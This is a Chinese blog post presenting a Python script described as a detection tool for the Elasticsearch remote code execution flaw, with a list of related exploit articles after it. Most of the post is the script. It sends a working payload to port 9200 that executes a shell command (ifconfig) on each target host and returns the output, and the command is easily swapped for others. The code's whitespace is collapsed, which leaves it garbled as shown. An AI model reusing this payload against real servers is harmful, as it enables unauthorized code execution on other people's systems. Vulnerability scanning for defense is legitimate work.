[更新]Elasticsearch 代码执行漏洞利用检测工具
2014-05-26 12:41
686 查看
1.概述
2.
漏洞利用
3.
检测工具
ElasticSearch漏洞检测工具,如下图所示:
python检测代码:
#!/usr/bin/envpython
#-*-coding:UTF-8-*-
__description__="""
detail:http://p2j.cn/?p=1300
solution:http://bouk.co/blog/elasticsearch-rce/"""
__author__='JekkayHu'importurllib2defcheckit(domain):
ifnot(str(domain)).startswith('http'):
url='http://'+domain
else:
url=domain
ifurl.endswith('/'):
url=url.rstrip('/')payload=":9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;import%20java.io.*;String%20str%20=%20\\%22\\%22;BufferedReader%20br%20=%20new%20BufferedReader(new%20InputStreamReader(Runtime.getRuntime().exec(\\%22ifconfig\\%22).getInputStream()));StringBuilder%20sb%20=%20new%20StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();%22}}}"
url+=payload
try:
#url='http://www.baidu.com/'
headers={"User-Agent":"Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.1"}
req=urllib2.Request(url,headers=headers)
response=urllib2.urlopen(req,timeout=20)
html=response.read()ifnothtml:
return
ifstr(html).find('\"exp\"')>=0:
return[1,html]
exceptException,e:
passif__name__=='__main__':
importsys
iflen(sys.argv)<=1:
print"Usage:python20140523Elasticsearch.py1.2.3.411.22.33.44"
foriinxrange(1,len(sys.argv)):
info=checkit(sys.argv[i])
ifinfo:
print"server[%s]isvulable,returndata:[%s]"%(sys.argv[i],info[1])
elasticsearch漏洞检测工具下载地址:
http://download.csdn.net/detail/hujkay/7402093
相关文章推荐
- Elasticsearch 代码执行漏洞利用工具
- 【更新WordPress 4.6漏洞利用PoC】PHPMailer曝远程代码执行高危漏洞(CVE-2016-10033)
- 利用本地包含漏洞执行任意代码
- 代码漏洞检测工具整理
- 利用本地包含漏洞执行任意代码
- cve-2010-4452 codebase 和code标签属性未检测同源策略导致任意代码执行漏洞
- ThinkPHP框架任意代码执行漏洞的利用及其修复方法
- 利用本地包含漏洞执行任意代码
- Bash Shellshock(Bash远程代码执行)漏洞分析及利用思路
- ElasticSearch Groovy脚本远程代码执行漏洞检测脚本和修复方案
- Struts2远程代码执行漏洞检测的原理和代码级实现
- ElasticSearch远程任意代码执行漏洞(CVE-2014-3120)分析
- 安卓WebView中接口隐患(远程代码执行漏洞)与手机挂马利用
- ElasticSearch Groovy脚本远程代码执行漏洞
- Bash Shellshock(Bash远程代码执行)漏洞批量利用脚本
- Struts2 远程执行代码(S2-016) 利用工具
- DedeCMS全版本通杀SQL注入漏洞利用代码及工具
- 『原创』PHP168 0Day 文件代码泄露漏洞利用工具
- elasticsearch远程代码执行漏洞告警
- IE 不能正确处理 MIME 格式邮件附件导致执行攻击者代码漏洞(NIMDA就是利用了此漏洞)